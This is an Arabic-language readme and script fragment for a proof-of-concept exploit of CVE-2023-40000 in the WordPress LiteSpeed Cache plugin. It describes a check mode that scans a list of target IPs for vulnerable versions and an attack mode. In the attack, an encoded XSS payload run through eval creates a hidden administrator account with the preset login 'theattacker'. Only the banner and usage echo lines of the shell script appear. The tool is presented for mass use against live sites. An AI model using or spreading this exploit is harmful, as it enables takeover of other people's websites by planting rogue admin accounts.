
هذا هو PoC لثغرة cve-2023-40000. استغلال لـ Wordpress LiteSpeed Cache.
هذا هو PoC لـ cve-2023-40000. استغلال لـ Wordpress LiteSpeed Cache.
يمكن تطبيق هذا CVE على جميع إصدارات LiteSpeed Cache الأقل من 5.7.0.1.
يعمل في وضعين: check و attack.
سيقوم بجمع إصدارات العناوين IP الضعيفة. إذا لم يكن هناك إصدار (فإن الهدف محمي بواسطة WAF).
كود XSS مشفر لدالة eval مع بيانات تسجيل دخول/كلمة مرور/بريد إلكتروني معرّفة مسبقًا.
# user_login=theattacker
# [email protected]
# pass1=attackpass&pass2=attackpass
# role=administrator
echo "----------------Welcome-to-cve-2023-40000-script-by-1veresk------------+";
echo "+----------------------------------------------------------------------+";
echo "+-------------------For-The-Help---------------------------------------+";
echo "Example#1: ./cve-2023-40000.sh -h--------------------------------------+";
echo "+-------------------For-The--Check-------------------------------------+";
echo "Example#2: ./cve-2023-40000.sh <TARGET_FILE> <MODE>--------------------+";
echo "+----------------------------------------------------------------------+";